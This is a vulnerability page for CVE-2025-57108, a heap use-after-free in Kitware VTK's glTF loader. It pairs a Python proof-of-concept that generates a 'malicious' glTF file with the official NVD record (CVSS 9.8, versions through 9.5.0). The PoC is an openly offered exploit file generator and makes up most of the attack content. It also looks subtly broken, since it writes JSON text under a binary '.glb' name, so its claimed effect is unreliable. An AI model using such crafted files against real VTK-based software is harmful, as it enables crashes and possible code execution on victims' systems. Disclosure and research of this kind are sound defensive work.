CVE-2025-57108

#!/usr/bin/env python3 """ CVE-2025-57108 PoC - Malicious GLTF file generator Kitware VTK vtkGLTFDocumentLoader Heap Use-After-Free """ import json import struct import os def create_malicious_gltf(): """ Generate a malicious GLTF file that triggers use-after-free in vtkGLTFDocumentLoader during mesh copy operations. """ # Malicious GLTF content with invalid mesh references gltf_data = { "asset": {"version": "2.0"}, "scene": 0, "scenes": [{"nodes": [0]}], "nodes": [{"mesh": 0}], "meshes": [{ "name": "malicious_mesh", "primitives": [ { "attributes": { "POSITION": 0}, "indices": 1, # Invalid accessor reference triggers vulnerability "material": 999999999 # Invalid reference } ] }], "accessors": [ { "bufferView": 0, "componentType": 5126, "count": 3, "type": "VEC3", "max": [1.0, 1.0, 1.0], "min": [-1.0, -1.0, -1.0] }, { "bufferView": 1, "componentType": 5123, "count": 6, "type": "SCALAR" } ], "bufferViews": [ {"buffer": 0, "byteOffset": 0, "byteLength": 36}, {"buffer": 0, "byteOffset": 36, "byteLength": 12} ], "buffers": [ {"byteLength": 48, "uri": "data:application/octet-stream;base64,AAAAAAAAAAAAAAAAAAAAACAAAAAAACAAAAAAACAAAAAAACAAAAAAACAAAAAAACAAAAA=="} ] } # Write malicious GLTF file output_path = "malicious_cube.glb" with open(output_path, 'w') as f: json.dump(gltf_data, f) print(f"[+] Created malicious GLTF file: {output_path}") print(f"[+] File triggers use-after-free in vtkGLTFDocumentLoader") return output_path if __name__ == "__main__": create_malicious_gltf()

{"cve": {"id": "CVE-2025-57108", "sourceIdentifier": "[email protected]", "published": "2025-10-31T15:15:42.550", "lastModified": "2025-11-05T19:37:49.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kitware VTK (Visualization Toolkit) through 9.5.0 contains a heap use-after-free vulnerability in vtkGLTFDocumentLoader. The vulnerability manifests during mesh object copy operations where vector members are accessed after the underlying memory has been freed, specifically when handling GLTF files with corrupted or invalid mesh reference structures."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vtk:vtk:*:*:*:*:*:*:*:*", "versionEndIncluding": "9.5.0", "matchCriteriaId": "4FACF42A-92AA-4011-9219-A8F328C6FF63"}]}]}], "references": [{"url": "https://gitlab.kitware.com/vtk/vtk/-/issues/19736", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}